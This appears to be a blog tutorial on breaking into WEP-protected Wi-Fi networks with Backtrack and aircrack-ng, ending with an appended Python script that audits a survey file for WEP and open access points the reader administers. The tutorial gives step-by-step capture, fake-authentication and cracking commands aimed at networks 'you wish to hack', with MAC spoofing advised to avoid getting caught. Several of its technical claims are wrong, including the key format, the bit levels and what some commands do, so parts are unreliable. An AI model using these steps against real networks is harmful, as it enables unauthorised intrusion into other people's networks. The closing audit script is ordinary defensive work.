Wifi, or Wireless Fidelity, is the name of a popular wireless networking technology that uses radio waves to provide wireless high-speed Internet and network connections. Wifi has become an integral part of our lives today.
Right from mobile phones to laptops to iPads, every device now has Wifi support.
Wifi is secured using the WEP protocol, which intends to secure wireless LANs like wired LANs by encrypting data over radio waves. However, it has been found that WEP is not as secure as once believed. Now almost anyone can hack into a Wifi network by generating the valid WEP key using Backtrack. Read on to learn how.
Disclaimer: This tutorial is given for educational purposes only; the blogger cannot be held liable for any misuse of this information.
SETTING UP THE CARD AND THE CONSOLE
Boot up Backtrack on your virtual machine/laptop and open up the command console and type the commands as they are given -
* ifconfig
This is the Linux equivalent of ipconfig; you will see the network adapters in your system. See which one is for Wi-Fi. A few examples are wlan0, wifi0, etc.
* airmon-ng
This command will initialize the Wi-Fi network monitoring & will tell you how many networks are in range
* airmon-ng stop [Wi-Fi Card name(without the quotes)]
This command will stop the card's broadcast and reception immediately
* macchanger --mac [Desired MAC address] [Wi-Fi card name]
This command will change the current MAC address to any MAC address you desire, so that you don’t get caught later
* airmon-ng start [Wi-Fi Card name]
You will see another extra adapter that is set on monitor mode. Use that adapter for all further purposes in the following commands where '[Wi-Fi card name]' appears.
DUMPING PACKETS
Once you have set up all the parameters, you need to sniff and dump data packets in order to get the key. You can do so by using the following commands. On the command console, type these commands -
* airodump-ng [Wi-Fi card name]
Copy and paste the BSSID in the following command and execute it
* airodump-ng -c [Channel Number] -w [Desired Filename for later decryption] --bssid [BSSID] [Wi-Fi Card name]
As you execute the command, you will see a certain number of beacons and data packets that will be stored in the filename you have given. The file will be stored in the root of the system drive (click on Computer and you will see the file). The file will be present in two formats: *.cap, *.txt.
SPEEDING UP THINGS
However, packet dumping is quite a slow process, so we need to speed things up to save time. Open a new console after the first data packet has been stored, then type the following command in the new console and execute it
* aireplay-ng -1 0 -a [BSSID] -h [FAKED MAC ADDRESS] -e [Wi-Fi name (you wish to hack)] [Wi-Fi card name]
As you type this command, you will see that the data packets required for breaking the key will increase dramatically, thereby saving you a lot of time.
REVEALING WEP KEY
Open another console once you have around 20,000 data packets and type the following command to reveal the WEP key.
aircrack-ng -n 64 -b [BSSID] [Filename without the extension]
As you type this command, you will see that a key will appear in front of you in the given below format:
XX:XX:XX:XX
It is not necessary that the key should have exactly the same digits as shown above, so please don't freak out if you see a 10 digit or 14 digit key. Also, if the decryption fails, you can change the bit level of the decryption in the command:
aircrack-ng -n [BIT LEVEL] -b [BSSID] [Filename without extension]
Remember, the bit level should be a number of the form 2^n where n = 1, 2, 3, 4…
e.g.
aircrack-ng -n 32 -b [BSSID] [Filename without the extension]
OR
aircrack-ng -n 128 -b [BSSID] [Filename without the extension] etc.
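From the defender's side, the same kind of survey file can be used to check whether any access point you administer still advertises WEP (or no encryption) and should be moved to WPA2/WPA3. This is an added example, not part of the original tutorial; the CSV column layout, the `MANAGED` inventory and all sample rows are assumptions constructed for illustration.

```python
import csv
import io

# Constructed sample survey; column names are assumed to follow the CSV that
# airodump-ng writes. All BSSIDs and ESSIDs here are made up.
SAMPLE_SURVEY = """\
BSSID, First time seen, Last time seen, channel, Speed, Privacy, Cipher, Authentication, Power, # beacons, # IV, LAN IP, ID-length, ESSID, Key
02:00:00:AA:00:01, 2024-01-01 10:00:00, 2024-01-01 10:05:00,  6,  54, WEP , WEP,    , -40, 120, 15,   0.  0.  0.  0,  9, office-ap,
02:00:00:AA:00:02, 2024-01-01 10:00:00, 2024-01-01 10:05:00, 11,  54, WPA2, CCMP, PSK, -55,  98,  0,   0.  0.  0.  0, 10, office-new,
02:00:00:AA:00:03, 2024-01-01 10:00:00, 2024-01-01 10:05:00,  1,  54, OPN ,    ,    , -60,  40,  0,   0.  0.  0.  0,  5, guest,
02:00:00:BB:00:09, 2024-01-01 10:00:00, 2024-01-01 10:05:00,  6,  54, WEP , WEP,    , -80,  20,  3,   0.  0.  0.  0,  9, neighbour,

Station MAC, First time seen, Last time seen, Power, # packets, BSSID, Probed ESSIDs
02:00:00:DD:00:10, 2024-01-01 10:01:00, 2024-01-01 10:04:00, -50, 30, 02:00:00:AA:00:01, office-ap
"""

# Privacy values that should not remain on a network you run, with the reason.
WEAK = {
    "WEP": "WEP key is recoverable from captured traffic; move to WPA2/WPA3",
    "OPN": "no encryption; traffic is readable by anyone in range",
}
# Hypothetical inventory of the BSSIDs this site administers.
MANAGED = {"02:00:00:AA:00:01", "02:00:00:AA:00:02", "02:00:00:AA:00:03"}

def parse_access_points(text):
    """Return one dict per access-point row; stop at the station section."""
    aps, header = [], None
    for row in csv.reader(io.StringIO(text), skipinitialspace=True):
        cells = [c.strip() for c in row]
        if not any(cells):
            continue                      # blank separator lines
        if cells[0] == "BSSID":
            header = cells
        elif cells[0] == "Station MAC":
            break                         # client list follows; not needed here
        elif header and len(cells) >= len(header) - 1:
            aps.append(dict(zip(header, cells)))
    return aps

def audit(text, managed):
    """List (bssid, essid, mode, reason) for managed APs with weak privacy."""
    findings = []
    for ap in parse_access_points(text):
        bssid = ap["BSSID"].upper()
        if bssid not in managed:
            continue                      # a neighbour's AP is out of scope
        for mode in ap.get("Privacy", "").split():
            if mode in WEAK:
                findings.append((bssid, ap.get("ESSID", ""), mode, WEAK[mode]))
    return findings

if __name__ == "__main__":
    for finding in audit(SAMPLE_SURVEY, MANAGED):
        print(*finding, sep=" | ")
```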
